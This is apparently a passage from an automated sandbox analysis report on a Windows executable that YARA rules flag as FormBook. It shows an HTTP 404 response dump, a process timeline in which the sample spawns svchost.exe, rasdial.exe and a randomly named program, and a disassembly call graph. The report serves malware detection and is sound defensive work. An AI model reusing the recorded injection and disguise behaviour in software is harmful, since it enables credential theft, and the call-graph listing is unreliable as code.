2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                      Jan 10, 2025 21:48:03.513495922 CET224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                      Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:15:45:55
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\fFoOcuxK7M.exe"
                                                      Imagebase:0xc0000
                                                      File size:1'227'776 bytes
                                                      MD5 hash:72FC342138F06B0DFD4C6BDD3EDD676D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:15:45:58
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\fFoOcuxK7M.exe"
                                                      Imagebase:0x4c0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:15:46:20
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe"
                                                      Imagebase:0xd00000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:7
                                                      Start time:15:46:22
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\rasdial.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                      Imagebase:0x2a0000
                                                      File size:19'456 bytes
                                                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:15:46:34
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe"
                                                      Imagebase:0xd00000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:10
                                                      Start time:15:46:46
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff728280000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:7.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:67
                                                        execution_graph 101090 c107d 101095 c708b 101090->101095 101092 c108c 101126 e2d40 101092->101126 101096 c709b __write_nolock 101095->101096 101129 c7667 101096->101129 101100 c715a 101141 e050b 101100->101141 101107 c7667 59 API calls 101108 c718b 101107->101108 101160 c7d8c 101108->101160 101110 c7194 RegOpenKeyExW 101111 fe8b1 RegQueryValueExW 101110->101111 101116 c71b6 Mailbox 101110->101116 101112 fe8ce 101111->101112 101113 fe943 RegCloseKey 101111->101113 101164 e0db6 101112->101164 101113->101116 101125 fe955 _wcscat Mailbox __NMSG_WRITE 101113->101125 101115 fe8e7 101174 c522e 101115->101174 101116->101092 101117 c79f2 59 API calls 101117->101125 101120 fe90f 101177 c7bcc 101120->101177 101122 fe929 101122->101113 101124 c3f74 59 API calls 101124->101125 101125->101116 101125->101117 101125->101124 101186 c7de1 101125->101186 101251 e2c44 101126->101251 101128 c1096 101130 e0db6 Mailbox 59 API calls 101129->101130 101131 c7688 101130->101131 101132 e0db6 Mailbox 59 API calls 101131->101132 101133 c7151 101132->101133 101134 c4706 101133->101134 101190 f1940 101134->101190 101137 c7de1 59 API calls 101138 c4739 101137->101138 101192 c4750 101138->101192 101140 c4743 Mailbox 101140->101100 101142 f1940 __write_nolock 101141->101142 101143 e0518 GetFullPathNameW 101142->101143 101144 e053a 101143->101144 101145 c7bcc 59 API calls 101144->101145 101146 c7165 101145->101146 101147 c7cab 101146->101147 101148 c7cbf 101147->101148 101149 fed4a 101147->101149 101214 c7c50 101148->101214 101219 c8029 101149->101219 101152 c7173 101154 c3f74 101152->101154 101153 fed55 __NMSG_WRITE _memmove 101155 c3f82 101154->101155 101159 c3fa4 _memmove 101154->101159 101158 e0db6 Mailbox 59 API calls 101155->101158 101156 e0db6 Mailbox 59 API calls 101157 c3fb8 101156->101157 101157->101107 101158->101159 101159->101156 101161 c7d99 101160->101161 101162 c7da6 101160->101162 101161->101110 101163 e0db6 Mailbox 59 API calls 101162->101163 101163->101161 101166 e0dbe 101164->101166 101167 e0dd8 101166->101167 101169 e0ddc std::exception::exception 101166->101169 101222 e571c 101166->101222 101239 e33a1 DecodePointer 101166->101239 101167->101115 101240 e859b RaiseException 101169->101240 101171 e0e06 101241 e84d1 58 API calls _free 101171->101241 101173 e0e18 101173->101115 101175 e0db6 Mailbox 59 API calls 101174->101175 101176 c5240 RegQueryValueExW 101175->101176 101176->101120 101176->101122 101178 c7bd8 __NMSG_WRITE 101177->101178 101179 c7c45 101177->101179 101181 c7bee 101178->101181 101182 c7c13 101178->101182 101180 c7d2c 59 API calls 101179->101180 101185 c7bf6 _memmove 101180->101185 101250 c7f27 59 API calls Mailbox 101181->101250 101184 c8029 59 API calls 101182->101184 101184->101185 101185->101122 101187 c7df0 __NMSG_WRITE _memmove 101186->101187 101188 e0db6 Mailbox 59 API calls 101187->101188 101189 c7e2e 101188->101189 101189->101125 101191 c4713 GetModuleFileNameW 101190->101191 101191->101137 101193 f1940 __write_nolock 101192->101193 101194 c475d GetFullPathNameW 101193->101194 101195 c477c 101194->101195 101196 c4799 101194->101196 101198 c7bcc 59 API calls 101195->101198 101197 c7d8c 59 API calls 101196->101197 101199 c4788 101197->101199 101198->101199 101202 c7726 101199->101202 101203 c7734 101202->101203 101206 c7d2c 101203->101206 101205 c4794 101205->101140 101207 c7d3a 101206->101207 101209 c7d43 _memmove 101206->101209 101207->101209 101210 c7e4f 101207->101210 101209->101205 101211 c7e62 101210->101211 101213 c7e5f _memmove 101210->101213 101212 e0db6 Mailbox 59 API calls 101211->101212 101212->101213 101213->101209 101215 c7c5f __NMSG_WRITE 101214->101215 101216 c8029 59 API calls 101215->101216 101217 c7c70 _memmove 101215->101217 101218 fed07 _memmove 101216->101218 101217->101152 101220 e0db6 Mailbox 59 API calls 101219->101220 101221 c8033 101220->101221 101221->101153 101223 e5797 101222->101223 101230 e5728 101222->101230 101248 e33a1 DecodePointer 101223->101248 101225 e579d 101249 e8b28 58 API calls __getptd_noexit 101225->101249 101228 e575b RtlAllocateHeap 101228->101230 101238 e578f 101228->101238 101230->101228 101231 e5783 101230->101231 101235 e5733 101230->101235 101236 e5781 101230->101236 101245 e33a1 DecodePointer 101230->101245 101246 e8b28 58 API calls __getptd_noexit 101231->101246 101235->101230 101242 ea16b 58 API calls __NMSG_WRITE 101235->101242 101243 ea1c8 58 API calls 6 library calls 101235->101243 101244 e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101235->101244 101247 e8b28 58 API calls __getptd_noexit 101236->101247 101238->101166 101239->101166 101240->101171 101241->101173 101242->101235 101243->101235 101245->101230 101246->101236 101247->101238 101248->101225 101249->101238 101250->101185 101252 e2c50 _raise 101251->101252 101259 e3217 101252->101259 101258 e2c77 _raise 101258->101128 101276 e9c0b 101259->101276 101261 e2c59 101262 e2c88 DecodePointer DecodePointer 101261->101262 101263 e2c65 101262->101263 101264 e2cb5 101262->101264 101273 e2c82 101263->101273 101264->101263 101322 e87a4 59 API calls __wsplitpath_helper 101264->101322 101266 e2d18 EncodePointer EncodePointer 101266->101263 101267 e2cc7 101267->101266 101268 e2cec 101267->101268 101323 e8864 61 API calls 2 library calls 101267->101323 101268->101263 101271 e2d06 EncodePointer 101268->101271 101324 e8864 61 API calls 2 library calls 101268->101324 101271->101266 101272 e2d00 101272->101263 101272->101271 101325 e3220 101273->101325 101277 e9c2f EnterCriticalSection 101276->101277 101278 e9c1c 101276->101278 101277->101261 101283 e9c93 101278->101283 101280 e9c22 101280->101277 101307 e30b5 58 API calls 3 library calls 101280->101307 101284 e9c9f _raise 101283->101284 101285 e9ca8 101284->101285 101286 e9cc0 101284->101286 101308 ea16b 58 API calls __NMSG_WRITE 101285->101308 101294 e9ce1 _raise 101286->101294 101311 e881d 58 API calls 2 library calls 101286->101311 101289 e9cad 101309 ea1c8 58 API calls 6 library calls 101289->101309 101290 e9cd5 101292 e9cdc 101290->101292 101293 e9ceb 101290->101293 101312 e8b28 58 API calls __getptd_noexit 101292->101312 101297 e9c0b __lock 58 API calls 101293->101297 101294->101280 101295 e9cb4 101310 e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101295->101310 101299 e9cf2 101297->101299 101301 e9cff 101299->101301 101302 e9d17 101299->101302 101313 e9e2b InitializeCriticalSectionAndSpinCount 101301->101313 101314 e2d55 101302->101314 101305 e9d0b 101320 e9d33 LeaveCriticalSection _doexit 101305->101320 101308->101289 101309->101295 101311->101290 101312->101294 101313->101305 101315 e2d5e RtlFreeHeap 101314->101315 101316 e2d87 __dosmaperr 101314->101316 101315->101316 101317 e2d73 101315->101317 101316->101305 101321 e8b28 58 API calls __getptd_noexit 101317->101321 101319 e2d79 GetLastError 101319->101316 101320->101294 101321->101319 101322->101267 101323->101268 101324->101272 101328 e9d75 LeaveCriticalSection 101325->101328 101327 e2c87 101327->101258 101328->101327 101329 ffdfc 101370 cab30 Mailbox _memmove 101329->101370 101330 cb525 101435 129e4a 89 API calls 4 library calls 101330->101435 101334 e0db6 59 API calls Mailbox 101334->101370 101337 e0db6 59 API calls Mailbox 101354 c9f37 Mailbox 101337->101354 101338 100055 101430 129e4a 89 API calls 4 library calls 101338->101430 101342 cb475 101431 c8047 101342->101431 101343 100064 101347 cb47a 101347->101338 101358 1009e5 101347->101358 101348 c8047 59 API calls 101348->101354 101350 c7667 59 API calls 101350->101354 101351 ca057 101352 e2d40 67 API calls __cinit 101352->101354 101353 116e8f 59 API calls 101353->101354 101354->101337 101354->101338 101354->101342 101354->101347 101354->101348 101354->101350 101354->101351 101354->101352 101354->101353 101356 1009d6 101354->101356 101359 ca55a 101354->101359 101380 cc8c0 341 API calls 2 library calls 101354->101380 101381 cb900 60 API calls Mailbox 101354->101381 101355 c7de1 59 API calls 101355->101370 101439 129e4a 89 API calls 4 library calls 101356->101439 101440 129e4a 89 API calls 4 library calls 101358->101440 101438 129e4a 89 API calls 4 library calls 101359->101438 101364 10086a 101365 c9c90 Mailbox 59 API calls 101364->101365 101368 10085c 101365->101368 101366 100878 101437 129e4a 89 API calls 4 library calls 101366->101437 101368->101351 101436 11617e 59 API calls Mailbox 101368->101436 101369 cb21c 101411 c9d3c 101369->101411 101370->101330 101370->101334 101370->101351 101370->101354 101370->101355 101370->101364 101370->101366 101370->101368 101370->101369 101372 116e8f 59 API calls 101370->101372 101375 cb2b6 101370->101375 101377 13df23 101370->101377 101382 c9ea0 101370->101382 101406 c9c90 101370->101406 101425 13c193 85 API calls 2 library calls 101370->101425 101426 13c2e0 96 API calls Mailbox 101370->101426 101427 127956 59 API calls Mailbox 101370->101427 101428 13bc6b 341 API calls Mailbox 101370->101428 101429 11617e 59 API calls Mailbox 101370->101429 101372->101370 101373 cb22d 101374 c9d3c 60 API calls 101373->101374 101374->101375 101424 cf6a3 341 API calls 101375->101424 101441 13cadd 101377->101441 101379 13df33 101379->101370 101380->101354 101381->101354 101383 c9ebf 101382->101383 101404 c9eed Mailbox 101382->101404 101384 e0db6 Mailbox 59 API calls 101383->101384 101384->101404 101385 e2d40 67 API calls __cinit 101385->101404 101386 cb47a 101391 1009e5 101386->101391 101392 100055 101386->101392 101387 cb475 101388 c8047 59 API calls 101387->101388 101389 ca057 101388->101389 101389->101370 101390 116e8f 59 API calls 101390->101404 101589 129e4a 89 API calls 4 library calls 101391->101589 101586 129e4a 89 API calls 4 library calls 101392->101586 101393 c7667 59 API calls 101393->101404 101396 e0db6 59 API calls Mailbox 101396->101404 101398 100064 101398->101370 101400 c8047 59 API calls 101400->101404 101402 1009d6 101588 129e4a 89 API calls 4 library calls 101402->101588 101404->101385 101404->101386 101404->101387 101404->101389 101404->101390 101404->101392 101404->101393 101404->101396 101404->101400 101404->101402 101405 ca55a 101404->101405 101584 cc8c0 341 API calls 2 library calls 101404->101584 101585 cb900 60 API calls Mailbox 101404->101585 101587 129e4a 89 API calls 4 library calls 101405->101587 101408 c9c9b 101406->101408 101407 c9cd2 101407->101370 101408->101407 101590 c8cd4 59 API calls Mailbox 101408->101590 101410 c9cfd 101410->101370 101412 c9d4a 101411->101412 101422 c9d78 Mailbox 101411->101422 101413 c9d9d 101412->101413 101414 c9d50 Mailbox 101412->101414 101416 c8047 59 API calls 101413->101416 101415 c9d64 101414->101415 101419 ffa0f 101414->101419 101417 c9dcc 101415->101417 101418 c9d6f 101415->101418 101415->101422 101416->101422 101417->101422 101591 c8cd4 59 API calls Mailbox 101417->101591 101421 ff9e6 VariantClear 101418->101421 101418->101422 101419->101422 101592 116e8f 59 API calls 101419->101592 101421->101422 101422->101373 101424->101330 101425->101370 101426->101370 101427->101370 101428->101370 101429->101370 101430->101343 101432 c805a 101431->101432 101433 c8052 101431->101433 101432->101351 101593 c7f77 59 API calls 2 library calls 101433->101593 101435->101368 101436->101351 101437->101368 101438->101351 101439->101358 101440->101351 101479 c9837 101441->101479 101445 13cdb9 101446 13cf2e 101445->101446 101450 13cdc7 101445->101450 101546 13d8c8 92 API calls Mailbox 101446->101546 101449 13cf3d 101449->101450 101452 13cf49 101449->101452 101510 13c96e 101450->101510 101451 c9837 84 API calls 101469 13cbb2 Mailbox 101451->101469 101467 13cb61 Mailbox 101452->101467 101457 13ce00 101525 e0c08 101457->101525 101460 13ce33 101532 c92ce 101460->101532 101461 13ce1a 101531 129e4a 89 API calls 4 library calls 101461->101531 101465 13ce25 GetCurrentProcess TerminateProcess 101465->101460 101467->101379 101469->101445 101469->101451 101469->101467 101529 13fbce 59 API calls 2 library calls 101469->101529 101530 13cfdf 61 API calls 2 library calls 101469->101530 101471 13cfa4 101471->101467 101475 13cfb8 FreeLibrary 101471->101475 101472 13ce6b 101544 13d649 107 API calls _free 101472->101544 101475->101467 101477 13ce7c 101477->101471 101478 c9d3c 60 API calls 101477->101478 101545 c8d40 59 API calls Mailbox 101477->101545 101547 13d649 107 API calls _free 101477->101547 101478->101477 101480 c984b 101479->101480 101481 c9851 101479->101481 101480->101467 101497 13d7a5 101480->101497 101482 ff5d3 __i64tow 101481->101482 101483 c9899 101481->101483 101485 c9857 __itow 101481->101485 101489 ff4da 101481->101489 101548 e3698 83 API calls 3 library calls 101483->101548 101487 e0db6 Mailbox 59 API calls 101485->101487 101490 c9871 101487->101490 101488 ff552 Mailbox _wcscpy 101549 e3698 83 API calls 3 library calls 101488->101549 101489->101488 101491 e0db6 Mailbox 59 API calls 101489->101491 101490->101480 101492 c7de1 59 API calls 101490->101492 101493 ff51f 101491->101493 101492->101480 101494 e0db6 Mailbox 59 API calls 101493->101494 101495 ff545 101494->101495 101495->101488 101496 c7de1 59 API calls 101495->101496 101496->101488 101498 c7e4f 59 API calls 101497->101498 101499 13d7c0 CharLowerBuffW 101498->101499 101550 11f167 101499->101550 101503 c7667 59 API calls 101504 13d7f9 101503->101504 101557 c784b 101504->101557 101506 13d810 101507 c7d2c 59 API calls 101506->101507 101508 13d81c Mailbox 101507->101508 101509 13d858 Mailbox 101508->101509 101570 13cfdf 61 API calls 2 library calls 101508->101570 101509->101469 101511 13c989 101510->101511 101512 13c9de 101510->101512 101513 e0db6 Mailbox 59 API calls 101511->101513 101516 13da50 101512->101516 101515 13c9ab 101513->101515 101514 e0db6 Mailbox 59 API calls 101514->101515 101515->101512 101515->101514 101517 13dc79 Mailbox 101516->101517 101521 13da73 _strcat _wcscpy __NMSG_WRITE 101516->101521 101517->101457 101518 c9b98 59 API calls 101518->101521 101519 c9be6 59 API calls 101519->101521 101520 c9b3c 59 API calls 101520->101521 101521->101517 101521->101518 101521->101519 101521->101520 101522 e571c 58 API calls __crtGetStringTypeA_stat 101521->101522 101523 c9837 84 API calls 101521->101523 101574 125887 61 API calls 2 library calls 101521->101574 101522->101521 101523->101521 101526 e0c1d 101525->101526 101527 e0cb5 VirtualProtect 101526->101527 101528 e0c83 101526->101528 101527->101528 101528->101460 101528->101461 101529->101469 101530->101469 101531->101465 101533 c92d6 101532->101533 101534 e0db6 Mailbox 59 API calls 101533->101534 101535 c92e4 101534->101535 101536 c92f0 101535->101536 101575 c91fc 59 API calls Mailbox 101535->101575 101538 c9050 101536->101538 101576 c9160 101538->101576 101540 e0db6 Mailbox 59 API calls 101542 c90fb 101540->101542 101541 c905f 101541->101540 101541->101542 101542->101477 101543 c8d40 59 API calls Mailbox 101542->101543 101543->101472 101544->101477 101545->101477 101546->101449 101547->101477 101548->101485 101549->101482 101551 11f192 __NMSG_WRITE 101550->101551 101552 11f1d1 101551->101552 101555 11f1c7 101551->101555 101556 11f278 101551->101556 101552->101503 101552->101508 101555->101552 101571 c78c4 61 API calls 101555->101571 101556->101552 101572 c78c4 61 API calls 101556->101572 101558 c785a 101557->101558 101559 c78b7 101557->101559 101558->101559 101561 c7865 101558->101561 101560 c7d2c 59 API calls 101559->101560 101566 c7888 _memmove 101560->101566 101562 feb09 101561->101562 101563 c7880 101561->101563 101565 c8029 59 API calls 101562->101565 101573 c7f27 59 API calls Mailbox 101563->101573 101567 feb13 101565->101567 101566->101506 101568 e0db6 Mailbox 59 API calls 101567->101568 101569 feb33 101568->101569 101570->101509 101571->101555 101572->101556 101573->101566 101574->101521 101575->101536 101577 c9169 Mailbox 101576->101577 101578 ff19f 101577->101578 101583 c9173 101577->101583 101579 e0db6 Mailbox 59 API calls 101578->101579 101581 ff1ab 101579->101581 101580 c917a 101580->101541 101582 c9c90 Mailbox 59 API calls 101582->101583 101583->101580 101583->101582 101584->101404 101585->101404 101586->101398 101587->101389 101588->101391 101589->101389 101590->101410 101591->101422 101592->101422 101593->101432 101594 ffe27 101607 df944 101594->101607 101596 ffe3d 101597 ffebe 101596->101597 101598 ffe53 101596->101598 101616 cfce0 101597->101616 101696 c9e5d 60 API calls 101598->101696 101600 ffe92 101601 10089c 101600->101601 101604 ffe9a 101600->101604 101698 129e4a 89 API calls 4 library calls 101601->101698 101697 12834f 59 API calls Mailbox 101604->101697 101606 ffeb2 Mailbox 101606->101606 101608 df950 101607->101608 101609 df962 101607->101609 101610 c9d3c 60 API calls 101608->101610 101611 df968 101609->101611 101612 df991 101609->101612 101615 df95a 101610->101615 101613 e0db6 Mailbox 59 API calls 101611->101613 101614 c9d3c 60 API calls 101612->101614 101613->101615 101614->101615 101615->101596 101699 c8180 101616->101699 101618 cfd3d 101619 10472d 101618->101619 101679 d06f6 101618->101679 101704 cf234 101618->101704 101806 129e4a 89 API calls 4 library calls 101619->101806 101623 cfe3e 101627 cfe4c 101623->101627 101654 10488d 101623->101654 101810 1166ec 59 API calls 2 library calls 101623->101810 101624 104b53 101658 104742 101624->101658 101831 129e4a 89 API calls 4 library calls 101624->101831 101625 d0517 101633 e0db6 Mailbox 59 API calls 101625->101633 101626 1047d7 101626->101658 101808 129e4a 89 API calls 4 library calls 101626->101808 101627->101624 101637 1048f9 101627->101637 101708 c837c 101627->101708 101629 104755 101629->101626 101807 cf6a3 341 API calls 101629->101807 101631 e0db6 59 API calls Mailbox 101642 cfdd3 101631->101642 101640 d0545 _memmove 101633->101640 101634 1048b2 Mailbox 101634->101627 101813 1166ec 59 API calls 2 library calls 101634->101813 101635 104848 101811 1160ef 59 API calls 2 library calls 101635->101811 101644 104917 101637->101644 101814 c85c0 101637->101814 101649 e0db6 Mailbox 59 API calls 101640->101649 101642->101623 101642->101625 101642->101629 101642->101631 101642->101640 101642->101658 101660 c9ea0 341 API calls 101642->101660 101671 10480c 101642->101671 101651 c85c0 59 API calls 101644->101651 101655 104928 101644->101655 101645 cfea4 101652 104ad6 101645->101652 101653 cff32 101645->101653 101688 d0179 Mailbox _memmove 101645->101688 101646 10486b 101648 c9ea0 341 API calls 101646->101648 101648->101654 101694 d0106 _memmove 101649->101694 101651->101655 101830 129ae7 60 API calls 101652->101830 101656 e0db6 Mailbox 59 API calls 101653->101656 101654->101627 101654->101658 101812 13a2d9 85 API calls Mailbox 101654->101812 101655->101688 101822 1160ab 59 API calls Mailbox 101655->101822 101661 cff39 101656->101661 101660->101642 101661->101679 101715 d09d0 101661->101715 101662 104a4d 101663 c9ea0 341 API calls 101662->101663 101665 104a87 101663->101665 101665->101658 101825 c84c0 101665->101825 101667 cffb2 101667->101640 101674 cffe6 101667->101674 101667->101679 101809 129e4a 89 API calls 4 library calls 101671->101809 101673 104ab2 101829 129e4a 89 API calls 4 library calls 101673->101829 101678 c8047 59 API calls 101674->101678 101682 d0007 101674->101682 101676 c9c90 Mailbox 59 API calls 101676->101694 101677 c9d3c 60 API calls 101677->101688 101678->101682 101805 129e4a 89 API calls 4 library calls 101679->101805 101680 e0db6 59 API calls Mailbox 101680->101688 101681 d0398 101681->101606 101682->101679 101683 104b24 101682->101683 101685 d004c 101682->101685 101684 c9d3c 60 API calls 101683->101684 101684->101624 101685->101624 101685->101679 101686 d00d8 101685->101686 101687 c9d3c 60 API calls 101686->101687 101690 d00eb 101687->101690 101688->101662 101688->101673 101688->101677 101688->101679 101688->101680 101688->101681 101689 104a1c 101688->101689 101803 c8740 68 API calls __cinit 101688->101803 101804 c8660 68 API calls 101688->101804 101823 125937 68 API calls 101688->101823 101824 c89b3 69 API calls Mailbox 101688->101824 101691 e0db6 Mailbox 59 API calls 101689->101691 101690->101679 101792 c82df 101690->101792 101691->101662 101694->101676 101694->101688 101695 d0162 101694->101695 101695->101606 101696->101600 101697->101606 101698->101606 101700 c818f 101699->101700 101703 c81aa 101699->101703 101701 c7e4f 59 API calls 101700->101701 101702 c8197 CharUpperBuffW 101701->101702 101702->101703 101703->101618 101705 cf251 101704->101705 101706 cf272 101705->101706 101832 129e4a 89 API calls 4 library calls 101705->101832 101706->101642 101709 c838d 101708->101709 101710 fedbd 101708->101710 101711 e0db6 Mailbox 59 API calls 101709->101711 101712 c8394 101711->101712 101713 c83b5 101712->101713 101833 c8634 59 API calls Mailbox 101712->101833 101713->101637 101713->101645 101716 104cc3 101715->101716 101728 d09f5 101715->101728 101894 129e4a 89 API calls 4 library calls 101716->101894 101718 d0ce4 101719 d0cfa 101718->101719 101891 d1070 10 API calls Mailbox 101718->101891 101719->101667 101721 d0ee4 101721->101719 101723 d0ef1 101721->101723 101892 d1093 341 API calls Mailbox 101723->101892 101724 d0a4b PeekMessageW 101744 d0a05 Mailbox 101724->101744 101727 d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101727->101719 101730 d0f2a 101727->101730 101728->101744 101895 c9e5d 60 API calls 101728->101895 101896 116349 341 API calls 101728->101896 101729 104e81 Sleep 101729->101744 101732 105c58 TranslateMessage DispatchMessageW GetMessageW 101730->101732 101732->101732 101733 105c88 101732->101733 101733->101719 101734 c9e5d 60 API calls 101734->101744 101735 d0ea5 TranslateMessage DispatchMessageW 101736 d0e43 PeekMessageW 101735->101736 101736->101744 101737 104d50 TranslateAcceleratorW 101737->101736 101737->101744 101738 10581f WaitForSingleObject 101738->101744 101745 10583c GetExitCodeProcess CloseHandle 101738->101745 101740 d0d13 timeGetTime 101740->101744 101741 d0e5f Sleep 101764 d0e70 Mailbox 101741->101764 101742 c8047 59 API calls 101742->101744 101743 c7667 59 API calls 101743->101764 101744->101718 101744->101724 101744->101729 101744->101734 101744->101735 101744->101736 101744->101737 101744->101738 101744->101740 101744->101741 101744->101742 101746 d0f95 101744->101746 101747 105af8 Sleep 101744->101747 101749 e0db6 59 API calls Mailbox 101744->101749 101750 cb73c 314 API calls 101744->101750 101753 d0f4e timeGetTime 101744->101753 101757 c9837 84 API calls 101744->101757 101744->101764 101775 cfce0 314 API calls 101744->101775 101778 129e4a 89 API calls 101744->101778 101780 c84c0 69 API calls 101744->101780 101781 c9c90 59 API calls Mailbox 101744->101781 101782 c9ea0 314 API calls 101744->101782 101783 c82df 59 API calls 101744->101783 101784 c89b3 69 API calls 101744->101784 101785 11617e 59 API calls Mailbox 101744->101785 101786 1055d5 VariantClear 101744->101786 101787 10566b VariantClear 101744->101787 101788 c8cd4 59 API calls Mailbox 101744->101788 101789 105419 VariantClear 101744->101789 101790 116e8f 59 API calls 101744->101790 101791 c7de1 59 API calls 101744->101791 101834 ce6a0 101744->101834 101865 cf460 101744->101865 101885 c31ce 101744->101885 101890 ce420 341 API calls 101744->101890 101897 146018 59 API calls 101744->101897 101898 129a15 59 API calls Mailbox 101744->101898 101899 11d4f2 59 API calls 101744->101899 101900 1160ef 59 API calls 2 library calls 101744->101900 101901 c8401 59 API calls 